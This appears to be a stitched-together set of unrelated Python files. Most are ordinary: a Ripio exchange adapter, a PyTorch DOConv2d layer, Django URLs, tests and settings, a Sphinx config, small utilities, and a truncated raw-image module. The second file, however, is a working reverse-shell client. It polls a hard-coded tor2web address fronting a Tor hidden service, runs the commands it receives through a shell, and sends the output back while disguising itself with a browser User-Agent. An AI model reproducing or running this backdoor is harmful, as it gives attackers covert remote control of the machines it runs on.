# "side":"SELL",
# "pair":"BTC_USDC",
# "taker_fee":"0",
# "taker_side":"SELL",
# "maker_fee":"0",
# "taker":2577953,
# "maker":2577937
# }
#
# createOrder fills
#
# {
# "pair":"BTC_USDC",
# "exchanged":0.002,
# "match_price":10593.99,
# "maker_fee":0.0,
# "taker_fee":0.0,
# "timestamp":1601730306942
# }
#
id = self.safe_string(trade, 'id')
timestamp = self.safe_integer(trade, 'timestamp')
timestamp = self.safe_timestamp(trade, 'created_at', timestamp)
side = self.safe_string(trade, 'side')
takerSide = self.safe_string(trade, 'taker_side')
takerOrMaker = 'taker' if (takerSide == side) else 'maker'
if side is not None:
side = side.lower()
priceString = self.safe_string_2(trade, 'price', 'match_price')
amountString = self.safe_string_2(trade, 'amount', 'exchanged')
price = self.parse_number(priceString)
amount = self.parse_number(amountString)
cost = self.parse_number(Precise.string_mul(priceString, amountString))
marketId = self.safe_string(trade, 'pair')
market = self.safe_market(marketId, market)
feeCost = self.safe_number(trade, takerOrMaker + '_fee')
orderId = self.safe_string(trade, takerOrMaker)
fee = None
if feeCost is not None:
fee = {
'cost': feeCost,
'currency': market['base'] if (side == 'buy') else market['quote'],
}
return {
'id': id,
'order': orderId,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': market['symbol'],
'type': None,
'side': side,
'price': price,
'amount': amount,
'cost': cost,
'takerOrMaker': takerOrMaker,
'fee': fee,
'info': trade,
}
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
}
response = self.publicGetTradehistoryPair(self.extend(request, params))
#
# [
# {
# "created_at":1601322501,
# "amount":"0.00276",
# "price":"10850.020000",
# "side":"SELL",
# "pair":"BTC_USDC",
# "taker_fee":"0",
# "taker_side":"SELL",
# "maker_fee":"0",
# "taker":2577953,
# "maker":2577937
# }
# ]
#
return self.parse_trades(response, market, since, limit)
def fetch_balance(self, params={}):
self.load_markets()
response = self.privateGetBalancesExchangeBalances(params)
#
# [
# {
# "id":603794,
# "currency":"USD Coin",
# "symbol":"USDC",
# "available":"0",
# "locked":"0",
# "code":"exchange",
# "balance_type":"crypto"
# },
# ]
#
result = {'info': response}
for i in range(0, len(response)):
balance = response[i]
currencyId = self.safe_string(balance, 'symbol')
code = self.safe_currency_code(currencyId)
account = self.account()
account['free'] = self.safe_string(balance, 'available')
account['used'] = self.safe_string(balance, 'locked')
result[code] = account
return self.parse_balance(result)
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
market = self.market(symbol)
uppercaseType = type.upper()
uppercaseSide = side.upper()
request = {
'pair': market['id'],
'order_type': uppercaseType, # LIMIT, MARKET
'side': uppercaseSide, # BUY or SELL
'amount': self.amount_to_precision(symbol, amount),
}
if uppercaseType == 'LIMIT':
request['limit_price'] = self.price_to_precision(symbol, price)
response = self.privatePostOrderPair(self.extend(request, params))
#
# {
# "order_id": "160f523c-f6ef-4cd1-a7c9-1a8ede1468d8",
# "pair": "BTC_ARS",
# "side": "BUY",
# "amount": "0.00400",
# "notional": null,
# "fill_or_kill": False,
# "all_or_none": False,
# "order_type": "LIMIT",
# "status": "OPEN",
# "created_at": 1578413945,
# "filled": "0.00000",
# "limit_price": "10.00",
# "stop_price": null,
# "distance": null
# }
#
# createOrder market type
#
# {
# "order_id":"d6b60c01-8624-44f2-9e6c-9e8cd677ea5c",
# "pair":"BTC_USDC",
# "side":"BUY",
# "amount":"0.00200",
# "notional":"50",
# "fill_or_kill":false,
# "all_or_none":false,
# "order_type":"MARKET",
# "status":"OPEN",
# "created_at":1601730306,
# "filled":"0.00000",
# "fill_price":10593.99,
# "fee":0.0,
# "fills":[
# {
# "pair":"BTC_USDC",
# "exchanged":0.002,
# "match_price":10593.99,
# "maker_fee":0.0,
# "taker_fee":0.0,
# "timestamp":1601730306942
# }
# ],
# "filled_at":"2020-10-03T13:05:06.942186Z",
# "limit_price":"0.000000",
# "stop_price":null,
# "distance":null
# }
#
return self.parse_order(response, market)
def cancel_order(self, id, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' cancelOrder() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
'order_id': id,
}
response = self.privatePostOrderPairOrderIdCancel(self.extend(request, params))
#
# {
# "order_id": "286e560e-b8a2-464b-8b84-15a7e2a67eab",
# "pair": "BTC_ARS",
# "side": "SELL",
# "amount": "0.00100",
# "notional": null,
# "fill_or_kill": False,
# "all_or_none": False,
# "order_type": "LIMIT",
# "status": "CANC",
# "created_at": 1575472707,
# "filled": "0.00000",
# "limit_price": "681000.00",
# "stop_price": null,
# "distance": null
# }
#
return self.parse_order(response, market)
def fetch_order(self, id, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrder() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
'order_id': id,
}
response = self.privateGetOrderPairOrderId(self.extend(request, params))
#
# {
# "order_id": "0b4ff48e-cfd6-42db-8d8c-3b536da447af",
# "pair": "BTC_ARS",
# "side": "BUY",
# "amount": "0.00100",
# "notional": null,
# "fill_or_kill": False,
# "all_or_none": False,
# "order_type": "LIMIT",
# "status": "OPEN",
# "created_at": 1575472944,
# "filled": "0.00000",
# "limit_price": "661000.00",
# "stop_price": null,
# "distance": null
# }
#
return self.parse_order(response, market)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrders() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
# 'status': 'OPEN,PART,CLOS,CANC,COMP',
# 'offset': 0,
# 'limit': limit,
}
if limit is not None:
request['offset'] = limit
response = self.privateGetOrderPair(self.extend(request, params))
#
# {
# "next": "https://api.exchange.ripio.com/api/v1/order/BTC_ARS/?limit=20&offset=20&page=1&page_size=25&status=OPEN%2CPART",
# "previous": null,
# "results": {
# "data": [
# {
# "order_id": "ca74280b-6966-4b73-a720-68709078922b",
# "pair": "BTC_ARS",
# "side": "SELL",
# "amount": "0.00100",
# "notional": null,
# "fill_or_kill": False,
# "all_or_none": False,
# "order_type": "LIMIT",
# "status": "OPEN",
# "created_at": 1578340134,
# "filled": "0.00000",
# "limit_price": "665000.00",
# "stop_price": null,
# "distance": null
# },
# ]
# }
# }
#
results = self.safe_value(response, 'results', {})
data = self.safe_value(results, 'data', [])
return self.parse_orders(data, market, since, limit)
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
request = {
'status': 'OPEN,PART',
}
return self.fetch_orders(symbol, since, limit, self.extend(request, params))
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
request = {
'status': 'CLOS,CANC,COMP',
}
return self.fetch_orders(symbol, since, limit, self.extend(request, params))
def parse_order_status(self, status):
statuses = {
'OPEN': 'open',
'PART': 'open',
'CLOS': 'canceled',
'CANC': 'canceled',
'COMP': 'closed',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
#
# createOrder, cancelOrder, fetchOpenOrders, fetchClosedOrders, fetchOrders, fetchOrder
#
# {
# "order_id": "286e560e-b8a2-464b-8b84-15a7e2a67eab",
# "pair": "BTC_ARS",
# "side": "SELL",
# "amount": "0.00100",
# "notional": null,
# "fill_or_kill": False,
# "all_or_none": False,
# "order_type": "LIMIT",
# "status": "CANC",
# "created_at": 1575472707,
# "filled": "0.00000",
# "limit_price": "681000.00",
# "stop_price": null,
# "distance": null
# }
#
# {
# "order_id":"d6b60c01-8624-44f2-9e6c-9e8cd677ea5c",
# "pair":"BTC_USDC",
# "side":"BUY",
# "amount":"0.00200",
# "notional":"50",
# "fill_or_kill":false,
# "all_or_none":false,
# "order_type":"MARKET",
# "status":"OPEN",
# "created_at":1601730306,
# "filled":"0.00000",
# "fill_price":10593.99,
# "fee":0.0,
# "fills":[
# {
# "pair":"BTC_USDC",
# "exchanged":0.002,
# "match_price":10593.99,
# "maker_fee":0.0,
# "taker_fee":0.0,
# "timestamp":1601730306942
# }
# ],
# "filled_at":"2020-10-03T13:05:06.942186Z",
# "limit_price":"0.000000",
# "stop_price":null,
# "distance":null
# }
#
id = self.safe_string(order, 'order_id')
amount = self.safe_number(order, 'amount')
cost = self.safe_number(order, 'notional')
type = self.safe_string_lower(order, 'order_type')
priceField = 'fill_price' if (type == 'market') else 'limit_price'
price = self.safe_number(order, priceField)
side = self.safe_string_lower(order, 'side')
status = self.parse_order_status(self.safe_string(order, 'status'))
timestamp = self.safe_timestamp(order, 'created_at')
average = self.safe_value(order, 'fill_price')
filled = self.safe_number(order, 'filled')
remaining = None
fills = self.safe_value(order, 'fills')
trades = None
lastTradeTimestamp = None
if fills is not None:
numFills = len(fills)
if numFills > 0:
filled = 0
cost = 0
trades = self.parse_trades(fills, market, None, None, {
'order': id,
'side': side,
})
for i in range(0, len(trades)):
trade = trades[i]
filled = self.sum(trade['amount'], filled)
cost = self.sum(trade['cost'], cost)
lastTradeTimestamp = trade['timestamp']
if (average is None) and (filled > 0):
average = cost / filled
if filled is not None:
if (cost is None) and (price is not None):
cost = price * filled
if amount is not None:
remaining = max(0, amount - filled)
marketId = self.safe_string(order, 'pair')
symbol = self.safe_symbol(marketId, market, '_')
stopPrice = self.safe_number(order, 'stop_price')
return {
'id': id,
'clientOrderId': None,
'info': order,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': lastTradeTimestamp,
'symbol': symbol,
'type': type,
'timeInForce': None,
'postOnly': None,
'side': side,
'price': price,
'stopPrice': stopPrice,
'amount': amount,
'cost': cost,
'average': average,
'filled': filled,
'remaining': remaining,
'status': status,
'fee': None,
'trades': trades,
}
def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchMyTrades() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
# 'offset': 0,
# 'limit': limit,
}
if limit is not None:
request['limit'] = limit
response = self.privateGetTradePair(self.extend(request, params))
#
# {
# "next": "https://api.exchange.ripio.com/api/v1/trade/<pair>/?limit=20&offset=20",
# "previous": null,
# "results": {
# "data": [
# {
# "created_at": 1578414028,
# "amount": "0.00100",
# "price": "665000.00",
# "side": "BUY",
# "taker_fee": "0",
# "taker_side": "BUY",
# "match_price": "66500000",
# "maker_fee": "0",
# "taker": 4892,
# "maker": 4889
# },
# ]
# }
# }
#
results = self.safe_value(response, 'results', {})
data = self.safe_value(results, 'data', [])
return self.parse_trades(data, market, since, limit)
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
request = '/' + self.version + '/' + self.implode_params(path, params)
url = self.urls['api'][api] + request
query = self.omit(params, self.extract_params(path))
if api == 'public':
if query:
url += '?' + self.urlencode(query)
elif api == 'private':
self.check_required_credentials()
if method == 'POST':
body = self.json(query)
else:
if query:
url += '?' + self.urlencode(query)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + self.apiKey,
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return
#
# {"detail":"Authentication credentials were not provided."}
# {"status_code":400,"errors":{"pair":["Invalid pair FOOBAR"]},"message":"An error has occurred, please check the form."}
# {"status_code":400,"errors":{"order_type":["Invalid order type. Valid options: ['MARKET', 'LIMIT']"]},"message":"An error has occurred, please check the form."}
# {"status_code":400,"errors":{"non_field_errors":"Something unexpected ocurred!"},"message":"Seems like an unexpected error occurred. Please try again later or write us to support@ripio.com if the problem persists."}
# {"status_code":400,"errors":{"pair":["Invalid/Disabled pair BTC_ARS"]},"message":"An error has occurred, please check the form."}
#
detail = self.safe_string(response, 'detail')
if detail is not None:
feedback = self.id + ' ' + body
# self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], detail, feedback)
errors = self.safe_value(response, 'errors')
if errors is not None:
feedback = self.id + ' ' + body
keys = list(errors.keys())
for i in range(0, len(keys)):
key = keys[i]
error = self.safe_value(errors, key, [])
message = self.safe_string(error, 0)
# self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], message, feedback)
raise ExchangeError(feedback) # unknown message
|
# python 3
# requires reverse_https-tor2web_listener.py running as a tor hidden service on connect back host
# encoding is not quite right - multi-line returns (e.g., that of `dir`) format poorly
from urllib.request import urlopen,Request
from urllib.parse import urlencode
from urllib.error import URLError
from subprocess import Popen,PIPE
from random import randint
from time import sleep
# change this to the Tor HS identifier + tor2web server
# todo - cycle through various t2w servers if one is not responding
url = 'https://xmgem22g7efpwwqd.tor2web.org/'
#url = 'https://xmgem22g7efpwwqd.tor2web.fi/'
#url = 'https://xmgem22g7efpwwqd.onion.sh/'
headers = {
'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Charset' : 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
'Accept-Language' : 'en-US,en;q=0.8',
'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31',
}
active = False
while True:
# set up POST to url
data = {'stage' : 'probe',}
data = urlencode(data)
data = bytes(data, 'UTF-8')
req = Request(url, data, headers)
try:
response = urlopen(req)
html = response.readlines(512)
for l in html:
l = str(l)
if '<!-- t2wsh;;' in str(l):
cmd = l.split(';;')[1]
if cmd == 'endsession':
exit()
elif len(cmd) > 0:
#print('\n\nreceived command: %s' % (cmd))
proc = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE, stdin=PIPE)
cmdout = proc.stdout.read() + proc.stderr.read()
data = { 'stage' : 'output', 'cmdout' : '%s' % (cmdout), }
print(q for q in data)
data = urlencode(data)
print(data)
data = bytes(data, 'UTF-8')
print(data)
req = Request(url, data, headers)
response = urlopen(req)
active = True
else:
break
else:
active = False
except URLError as e:
# tor2web proxies are unreliable - this condition may occur
# frequently even with a fully functional listener and internet
# connection. Waiting helps.
print('Error opening URL: %s' % (e))
active = False
if not active:
# sleep for a while
t = randint(10,60)
print('sleeping %s' % (t))
sleep(t)
|
# coding=utf-8
import math
import torch
import numpy as np
from torch.nn import init
from itertools import repeat
from torch.nn import functional as F
import collections.abc as container_abcs
from typing import Optional
from torch.nn.parameter import Parameter
from torch.nn.modules.module import Module
class DOConv2d(Module):
"""
DOConv2d can be used as an alternative for torch.nn.Conv2d.
The interface is similar to that of Conv2d, with one exception:
1. D_mul: the depth multiplier for the over-parameterization.
Note that the groups parameter switchs between DO-Conv (groups=1),
DO-DConv (groups=in_channels), DO-GConv (otherwise).
"""
__constants__ = ['stride', 'padding', 'dilation', 'groups',
'padding_mode', 'output_padding', 'in_channels',
'out_channels', 'kernel_size', 'D_mul']
__annotations__ = {'bias': Optional[torch.Tensor]}
def __init__(self, in_channels, out_channels, kernel_size, D_mul=None, stride=1,
padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros'):
super(DOConv2d, self).__init__()
kernel_size = _pair(kernel_size)
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
if in_channels % groups != 0:
raise ValueError('in_channels must be divisible by groups')
if out_channels % groups != 0:
raise ValueError('out_channels must be divisible by groups')
valid_padding_modes = {'zeros', 'reflect', 'replicate', 'circular'}
if padding_mode not in valid_padding_modes:
raise ValueError("padding_mode must be one of {}, but got padding_mode='{}'".format(
valid_padding_modes, padding_mode))
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
self.padding_mode = padding_mode
self._padding_repeated_twice = tuple(x for x in self.padding for _ in range(2))
#################################### Initailization of D & W ###################################
M = self.kernel_size[0]
N = self.kernel_size[1]
self.D_mul = M * N if D_mul is None or M * N <= 1 else D_mul
self.W = Parameter(torch.Tensor(out_channels, in_channels // groups, self.D_mul))
init.kaiming_uniform_(self.W, a=math.sqrt(5))
if M * N > 1:
self.D = Parameter(torch.Tensor(in_channels, M * N, self.D_mul))
init_zero = np.zeros([in_channels, M * N, self.D_mul], dtype=np.float32)
self.D.data = torch.from_numpy(init_zero)
eye = torch.reshape(torch.eye(M * N, dtype=torch.float32), (1, M * N, M * N))
D_diag = eye.repeat((in_channels, 1, self.D_mul // (M * N)))
if self.D_mul % (M * N) != 0: # the cases when D_mul > M * N
zeros = torch.zeros([in_channels, M * N, self.D_mul % (M * N)])
self.D_diag = Parameter(torch.cat([D_diag, zeros], dim=2), requires_grad=False)
else: # the case when D_mul = M * N
self.D_diag = Parameter(D_diag, requires_grad=False)
##################################################################################################
if bias:
self.bias = Parameter(torch.Tensor(out_channels))
fan_in, _ = init._calculate_fan_in_and_fan_out(self.W)
bound = 1 / math.sqrt(fan_in)
init.uniform_(self.bias, -bound, bound)
else:
self.register_parameter('bias', None)
def extra_repr(self):
s = ('{in_channels}, {out_channels}, kernel_size={kernel_size}'
', stride={stride}')
if self.padding != (0,) * len(self.padding):
s += ', padding={padding}'
if self.dilation != (1,) * len(self.dilation):
s += ', dilation={dilation}'
if self.groups != 1:
s += ', groups={groups}'
if self.bias is None:
s += ', bias=False'
if self.padding_mode != 'zeros':
s += ', padding_mode={padding_mode}'
return s.format(**self.__dict__)
def __setstate__(self, state):
super(DOConv2d, self).__setstate__(state)
if not hasattr(self, 'padding_mode'):
self.padding_mode = 'zeros'
def _conv_forward(self, input, weight):
if self.padding_mode != 'zeros':
return F.conv2d(F.pad(input, self._padding_repeated_twice, mode=self.padding_mode),
weight, self.bias, self.stride,
_pair(0), self.dilation, self.groups)
return F.conv2d(input, weight, self.bias, self.stride,
self.padding, self.dilation, self.groups)
def forward(self, input):
M = self.kernel_size[0]
N = self.kernel_size[1]
DoW_shape = (self.out_channels, self.in_channels // self.groups, M, N)
if M * N > 1:
######################### Compute DoW #################
# (input_channels, D_mul, M * N)
D = self.D + self.D_diag
W = torch.reshape(self.W, (self.out_channels // self.groups, self.in_channels, self.D_mul))
# einsum outputs (out_channels // groups, in_channels, M * N),
# which is reshaped to
# (out_channels, in_channels // groups, M, N)
DoW = torch.reshape(torch.einsum('ims,ois->oim', D, W), DoW_shape)
#######################################################
else:
# in this case D_mul == M * N
# reshape from
# (out_channels, in_channels // groups, D_mul)
# to
# (out_channels, in_channels // groups, M, N)
DoW = torch.reshape(self.W, DoW_shape)
return self._conv_forward(input, DoW)
def _ntuple(n):
def parse(x):
if isinstance(x, container_abcs.Iterable):
return x
return tuple(repeat(x, n))
return parse
_pair = _ntuple(2)
|
from django.urls import path
from . import views
from .apps import app_name
app_name = app_name
urlpatterns = [
path('', views.FblogListView.as_view(), name='list'),
path('create/', views.FblogCreateView.as_view(),
name='create'),
]
|
from .cgnet import CGNet
from .fast_scnn import FastSCNN
from .hrnet import HRNet
from .mobilenet_v2 import MobileNetV2
from .mobilenet_v3 import MobileNetV3
from .resnest import ResNeSt
from .resnet import ResNet, ResNetV1c, ResNetV1d
from .resnet import ResNet_sp, ResNetV1c_sp, ResNetV1d_sp
from .resnext import ResNeXt
from .unet import UNet
from .swin_transformer import SwinTransformer
from .swin_transformer_3d import SwinTransformer3D
from .swin_transformer_3d_v2 import SwinTransformer3Dv2
from .swin_transformer_3d_v3 import SwinTransformer3Dv3
__all__ = [
'ResNet', 'ResNetV1c', 'ResNetV1d', 'ResNeXt', 'HRNet', 'FastSCNN', 'SwinTransformer3D', 'SwinTransformer3Dv2',
'ResNeSt', 'MobileNetV2', 'UNet', 'CGNet', 'MobileNetV3', 'SwinTransformer', 'SwinTransformer3Dv3',
'ResNet_sp', 'ResNetV1c_sp', 'ResNetV1d_sp',
]
|
import pytest
from django.urls import resolve, reverse
from django_machinelearning.users.models import User
pytestmark = pytest.mark.django_db
def test_detail(user: User):
assert (
reverse("users:detail", kwargs={"username": user.username})
== f"/users/{user.username}/"
)
assert resolve(f"/users/{user.username}/").view_name == "users:detail"
def test_update():
assert reverse("users:update") == "/users/~update/"
assert resolve("/users/~update/").view_name == "users:update"
def test_redirect():
assert reverse("users:redirect") == "/users/~redirect/"
assert resolve("/users/~redirect/").view_name == "users:redirect"
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Submission file for the python difference_of_squares exercise.
#
# v2: Using "x*x" instead of the slower "x**2" and remove left over
# "pass" statement in difference()
# v1: Using sum(), abs(), range() and "**2"
def difference(length):
"""
Return the (absolute) difference between the Square of Sums and the
Sum of Squares in the interval [1, length].
"""
return abs(square_of_sum(length) - sum_of_squares(length))
def square_of_sum(length):
"""
Return the Square of Sums in the interval [1, length].
"""
s = sum(range(1, length+1))
return s*s
def sum_of_squares(length):
"""
Return the sum of Squares in the interval [1, length].
"""
return sum([x*x for x in range(1, length+1)])
|
"""
Test settings for merlin project.
- Used to run tests fast on the continuous integration server and locally
"""
from .base import * # noqa
# DEBUG
# ------------------------------------------------------------------------------
# Turn debug off so tests run faster
DEBUG = False
TEMPLATES[0]['OPTIONS']['debug'] = False
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
SECRET_KEY = env('DJANGO_SECRET_KEY', default='CHANGEME!!!')
# Mail settings
# ------------------------------------------------------------------------------
EMAIL_HOST = 'localhost'
EMAIL_PORT = 1025
# In-memory email backend stores messages in django.core.mail.outbox
# for unit testing purposes
EMAIL_BACKEND = 'django.core.mail.backends.locmem.EmailBackend'
# CACHING
# ------------------------------------------------------------------------------
# Speed advantages of in-memory caching without having to run Memcached
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
# TESTING
# ------------------------------------------------------------------------------
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# PASSWORD HASHING
# ------------------------------------------------------------------------------
# Use fast password hasher so tests run faster
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.MD5PasswordHasher',
]
# TEMPLATE LOADERS
# ------------------------------------------------------------------------------
# Keep templates in memory so tests run faster
TEMPLATES[0]['OPTIONS']['loaders'] = [
['django.template.loaders.cached.Loader', [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
], ],
]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# dagger documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 9 13:47:02 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#
import os
import sys
import dagger
sys.path.insert(0, os.path.abspath(".."))
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ["sphinx.ext.autodoc", "sphinx.ext.viewcode", "numpydoc"]
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# General information about the project.
project = u"dagger"
copyright = u"2019, David Siklosi"
author = u"David Siklosi"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = dagger.__version__
# The full version, including alpha/beta/rc tags.
release = dagger.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# -- Options for HTMLHelp output ---------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "daggerdoc"
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto, manual, or own class]).
latex_documents = [
(master_doc, "dagger.tex", u"dagger Documentation", u"David Siklosi", "manual")
]
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "dagger", u"dagger Documentation", [author], 1)]
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"dagger",
u"dagger Documentation",
author,
"dagger",
"One line description of project.",
"Miscellaneous",
)
]
|
# -*- coding: utf-8 -*-
"""
Convert README file from Markdown to text
"""
from markdown import markdown
import html2text # from `aaronsw` :(
MARKER = 'MARKER()()MARKER'
def fix_quotes(mdcontent):
count = 0
quote_state = False
quote_char = '`'
quote_string = ''
new_string = ''
quotes = []
for char in mdcontent:
is_quote = char == quote_char
if quote_state and not is_quote:
quote_string += char
if is_quote:
count += 1
else:
count = 0
if not quote_state:
new_string += char
if count == 3:
if quote_state:
new_string += MARKER
quotes.append(quote_string.split('\n')[1:])
# for line in quote_string.split('\n')[1:]:
# if line.strip() != '':
# print("LINE *%s*" % line)
# new_string += '\t' + line + '\n'
quote_state = False
else:
quote_state = True
quote_string = ''
return new_string, quotes
def fix_text(marked_text, quotes):
new_string = ''
quotes = quotes[::-1]
for piece in marked_text.split(MARKER):
new_string += piece
try:
quote = quotes.pop()
except IndexError:
pass
else:
for line in quote:
if line.strip() != '':
# print("LINE *%s*" % line)
new_string += '\t' + line + '\n'
return new_string
def convert_markdown_file(input_file):
# input_file = 'README.md'
output_file = input_file.split('.')[0]
with open(input_file, 'r') as rhandler:
# markdown
mdcontent = rhandler.read()
marked_content, quotes = fix_quotes(mdcontent)
# HTML
html = markdown(marked_content)
# text
marked_text = html2text.html2text(html)
text = fix_text(marked_text, quotes)
with open(output_file, 'w') as whandler:
whandler.write(text)
|
def split_caps(key):
""" splits a string using capital letters as separator
eg split_caps('ExampleString') returns ['Example', 'String']
"""
b = False
lst = []
x = 0
for i, ch in enumerate(key):
if i > 0 and ch.isupper():
temp = key[x:i]
if b and not temp.isupper():
lst.append(key[x:i-1])
x = i-1
b = True
elif b:
lst.append(key[x:i-1])
b = False
x = i-1
lst.append(key[x:])
return lst
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Forward processing of raw data to sRGB images.
Unprocessing Images for Learned Raw Denoising
http://timothybrooks.com/tech/unprocessing
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
def apply_gains(bayer_images, red_gains, blue_gains):
"""Applies white balance gains to a batch of Bayer images."""
bayer_images.shape.assert_is_compatible_with((None, None, None, 4))
green_gains = tf.ones_like(red_gains)
gains = tf.stack([red_gains, green_gains, green_gains, blue_gains], axis=-1)
gains = gains[:, tf.newaxis, tf.newaxis, :]
return bayer_images * gains
def demosaic(bayer_images):
"""Bilinearly demosaics a batch of RGGB Bayer images."""
bayer_images.shape.assert_is_compatible_with((None, None, None, 4))
# This implementation exploits how edges are aligned when upsampling with
# tf.image.resize_bilinear().
with tf.name_scope(None, 'demosaic'):
shape = tf.shape(bayer_images)
shape = [shape[1] * 2, shape[2] * 2]
red = bayer_images[Ellipsis, 0:1]
red = tf.image.resize_bilinear(red, shape)
green_red = bayer_images[Ellipsis, 1:2]
green_red = tf.image.flip_left_right(green_red)
green_red = tf.image.resize_bilinear(green_red, shape)
green_red = tf.image.flip_left_right(green_red)
green_red = tf.space_to_depth(green_red, 2)
green_blue = bayer_images[Ellipsis, 2:3]
green_blue = tf.image.flip_up_down(green_blue)
green_blue = tf.image.resize_bilinear(green_blue, shape)
green_blue = tf.image.flip_up_down(green_blue)
green_blue = tf.space_to_depth(green_blue, 2)
green_at_red = (green_red[Ellipsis, 0] + green_blue[Ellipsis, 0]) / 2
green_at_green_red = green_red[Ellipsis, 1]
green_at_green_blue = green_blue[Ellipsis, 2]
green_at_blue = (green_red[Ellipsis, 3] + green_blue[Ellipsis, 3]) / 2
green_planes = [
green_at_red, green_at_green_red, green_at_green_blue, green_at_blue
]
green = tf.depth_to_space(tf.stack(green_planes, axis=-1), 2)
blue = bayer_images[Ellipsis, 3:4]
